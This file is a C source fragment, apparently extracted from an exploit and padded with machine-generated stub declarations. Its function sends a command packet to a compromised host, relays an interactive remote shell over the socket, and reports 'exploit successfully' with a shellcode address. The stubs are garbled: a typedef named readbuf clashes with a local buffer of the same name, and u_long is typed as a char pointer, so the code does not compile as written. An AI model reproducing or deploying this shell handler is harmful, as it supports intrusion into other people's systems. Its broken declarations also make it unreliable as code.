
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef char* u_long ;
typedef int readbuf ;
typedef int fd_set ;


 char* DEF_COMM ;
 char* DEF_COMM_OB ;
 scalar_t__ FD_ISSET (int,int *) ;
 int FD_SET (int,int *) ;
 int FD_ZERO (int *) ;
 int GET_R ;
 int NRL ;
 int SCS ;
 int STDIN_FILENO ;
 int exit (int) ;
 int fflush (int ) ;
 int fprintf (int ,char*,...) ;
 int memset (char*,int,int) ;
 int read (int,char*,int) ;
 int select (int,int *,int *,int *,int *) ;
 int send (int,char*,int ,int) ;
 int stderr ;
 int stdout ;
 int strlen (char*) ;
 scalar_t__ strstr (char*,char*) ;
 int t_g ;
 int write (int,char*,int) ;

void conn_shell(int conn_sock,u_long scs_addr)
{
 int died;
 int ex_t=(NRL);
 char *command,readbuf[(GET_R)];
 fd_set rset;

 switch(t_g)
 {
  case 0:
  case 1:
  case 2:
  case 3:
  case 4:
  case 5:
   command=(DEF_COMM);
   break;
  case 6:
  case 7:
  case 8:
   command=(DEF_COMM_OB);
   break;
 }
 memset((char *)readbuf,(NRL),sizeof(readbuf));
 fprintf(stdout," [*] Send, command packet !\n\n");
 send(conn_sock,command,strlen(command),(NRL));

 for(;;)
 {
  fflush(stdout);
  FD_ZERO(&rset);
  FD_SET(conn_sock,&rset);
  FD_SET(STDIN_FILENO,&rset);
  select(conn_sock+1,&rset,((void*)0),((void*)0),((void*)0));

  if(FD_ISSET(conn_sock,&rset))
  {
   died=read(conn_sock,readbuf,sizeof(readbuf)-1);
   if(died<=(NRL))
   {
    if(!ex_t)
    {
    fprintf(stderr," [-] exploit failure.\n\n");
     return;
    }
    else
    {
 fprintf(stdout," [*] exploit successfully ! (&shellcode_addr: %p)\n\n",scs_addr);
     exit(NRL);
    }
   }
   readbuf[died]=(NRL);
   fprintf(stdout,"%s",readbuf);
  }
  if(FD_ISSET(STDIN_FILENO,&rset))
  {
   died=read(STDIN_FILENO,readbuf,sizeof(readbuf)-1);
   if(died>(NRL))
   {
    readbuf[died]=(NRL);
    if(strstr(readbuf,"exit"))
     ex_t=(SCS);
    write(conn_sock,readbuf,died);
   }
  }
 }
 return;
}
